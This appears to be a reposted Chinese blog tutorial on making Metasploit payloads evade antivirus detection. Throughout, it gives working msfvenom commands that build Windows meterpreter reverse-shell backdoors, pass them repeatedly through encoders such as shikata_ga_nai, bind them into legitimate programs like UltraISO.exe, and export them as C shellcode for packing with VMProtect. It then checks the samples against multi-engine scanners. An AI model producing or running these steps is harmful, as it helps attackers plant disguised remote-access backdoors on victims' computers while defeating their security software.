目錄

（一）認識免殺

1、殺軟是如何檢測出惡意代碼的？

2、免殺是做什么？

3、免殺的基本方法有哪些？

(二） 不處理payload直接生成樣本進行檢測

1、生成后門

2、開啟http服務

3、打開Web頁

4、在網站上傳分析

（三） MSF自編碼處理payload生成樣本進行檢測

1、查看可以用編碼模塊

?2、使用 ?x86/shikata_ga_nai 模塊

（四）?MSF自捆綁處理payload生成樣本進行檢測

1、使用msfvenom的-x參數

（五）MSF自捆綁+編碼處理payload生成樣本進行檢測

1、結合前二種編碼方式我們再次生成樣本

2、增大編碼次數

（六）MSF多重編碼payload生成樣本進行檢測

(七)?生成Shellcode使用C語言調用

1、直接在linux中利用msf的meterpreter生成的文件以.c形式文件存儲，得到機器碼

2、改c文件，并編譯，并加殼

?3、隨便寫一個hello world

---

（一）認識免殺

1、殺軟是如何檢測出惡意代碼的？

????????特征碼（id）、啟發式惡意軟件檢查和行為

2、免殺是做什么？

對特征進行混淆，打亂代碼，避免殺毒軟件查殺

3、免殺的基本方法有哪些？
?

自編碼處理??自捆綁+編碼??多重編碼???接口下載式??簽名偽裝式

針對殺毒軟件的基本檢測方法，我們可有以下幾種方法實現免殺：
VirScan - 多引擎文件在線檢測平臺

• 改變特征碼
• 改變行為
• 其它

---

(二） 不處理payload直接生成樣本進行檢測

1、生成后門

msfvenom -p windows/meterpreter/reverse_tcp LHOST=your ip???LPORT=4456 -f exe -o payload1.exe

2、開啟http服務

python2:

python -m SimpleHTTPServer

pytnon3:

python3 -m http.server

3、打開Web頁

打開瀏覽器 訪問?localhost:8000?或者?127.0.0.1:8000，下載有惡意代碼的文件

?

4、在網站上傳分析

VirScan - 多引擎文件在線檢測平臺

---

（三） MSF自編碼處理payload生成樣本進行檢測

1、查看可以用編碼模塊

msfvenom --list encoders

?2、使用 ?x86/shikata_ga_nai 模塊

? 它是免殺中使用頻率最高的一個編碼器

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai HOST=192.168.x.x LPORT=4456 -f exe -o payload1.exe

?后續方法同上

---

（四）?MSF自捆綁處理payload生成樣本進行檢測

1、使用msfvenom的-x參數

-x 參數可以指定一個可執行文件.exe,將payload與其捆綁

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=4456 -x yourset.exe -f exe -o payload2.exe

其他步驟同上

---

（五）MSF自捆綁+編碼處理payload生成樣本進行檢測

1、結合前二種編碼方式我們再次生成樣本

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=4456 -e x86/shikata_ga_nai -x yourset.exe -i 10 -f exe -o payload3.exe

其他操作同上

2、增大編碼次數

我們可以通過增大i的大小，增大成功率。

---

（六）MSF多重編碼payload生成樣本進行檢測

????????通過管道，讓msfvenom用不同編碼器反復編碼進行混淆。使用管道讓msfvenom對攻擊載荷多重編碼，先用shikata_ga_nai編碼10次，接著來10次的alpha_upper編碼，再來10次的countdown編碼，最后才生成以payload5.exe為模板的可執行文件。

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=192.168.110.110 LPORT=4456 -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x UltraISO.exe -f exe -o payload5.exe

---

(七)?生成Shellcode使用C語言調用

1、直接在linux中利用msf的meterpreter生成的文件以.c形式文件存儲，得到機器碼

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=4456 -f c >c0001.c

2、改c文件，并編譯，并加殼

?3、隨便寫一個hello world

main() {
printf("hello world\n");
}

然后編譯 并加殼

vmp加殼工具

總結

以上是生活随笔為你收集整理的msf编码免杀的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。